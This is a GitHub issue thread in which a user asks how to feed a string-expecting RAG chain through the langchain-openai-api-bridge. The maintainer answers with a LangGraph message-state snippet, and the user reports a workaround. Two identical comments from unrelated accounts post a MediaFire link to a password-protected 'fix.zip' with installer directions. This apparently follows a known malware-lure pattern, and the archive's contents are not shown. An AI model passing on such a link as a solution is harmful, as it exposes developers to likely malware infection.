### ISSUE TITLE
use a chain expecting a string as an agent?

### ISSUE THREAD

**Issue by lilmike** [samuelint/langchain-openai-api-bridge#40]
Hiya,

I found this library when trying to integrate an openai python project with my langchain solution. I'm wondering, I used a basic chain example (the rag-redis template) to construct a basic rag test case, and now I'm implementing this into it. I got so far as to get the /<prefix>/openai/v1 up and running, however when the api is called, the rag_redis modification throws an error because it expects a string, not a list. Can you possibly help with this?

Thanks,

-Michael.

P.S. I tried passing a simple string into the openai create method, but that caused the openai python bindings to explode lol.

**Comment by QAQ330** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by samuelint** [comment]
Hi Michael,

The library is currently designed to work with an input that is a list of messages. Since the OpenAI Chat Completion API or Assistant API involves a conversation, it requires the full conversation, including the AI's response history.
The LangGraph state must follow the react agent state format for messages.

```python
from typing import Annotated, Sequence, TypedDict

from langchain_core.messages import (
    BaseMessage,
)
from langgraph.graph.message import add_messages

class MyGraphState(TypedDict):
    messages: Annotated[Sequence[BaseMessage], add_messages]

    # rest of state
```

I plan to update the README and add an example about this soon.
Let me know if this resolves your issue.

**Comment by lilmike** [comment]
Hiya,

I ended up doing a hacky workaround, since I know exactly what I will be
doing with this API, and I know anything I pass to the openai endpoint
will be a list of a single dict, I ended up putting a RunnableLambda in
front of my main chain that return question if not isinstance(question,
list) else question[0]["content"].

On a side note, I ran into another issue that actually prompted this
discussion that the openai bridge was trying to get
messages[-1]["message"] or something similar, and I thought that was my
code for a long time, but solving that was simple, for the langchain api
I use the full chain with a StrOutputParser at the end, but the openai
bridge I pass it a chain with that removed.. Feel free to close this
issue :-)

-Michael.






-- 
Sorry about the test, it's just a me thing.
Michael Taboada, Creator of Games. Does that make me a god, well, sorta.
My pgp key: 79BC390E8864CD71305D4DD606CD2197A6EE5ED7
My website: https://michaels.world
2MB website: https://2mb.games
Don't believe everything you read on the internet. I might not be real, you might not be real, and this email certainly isn't real.
Sent from my brand new...
stationary bicycle
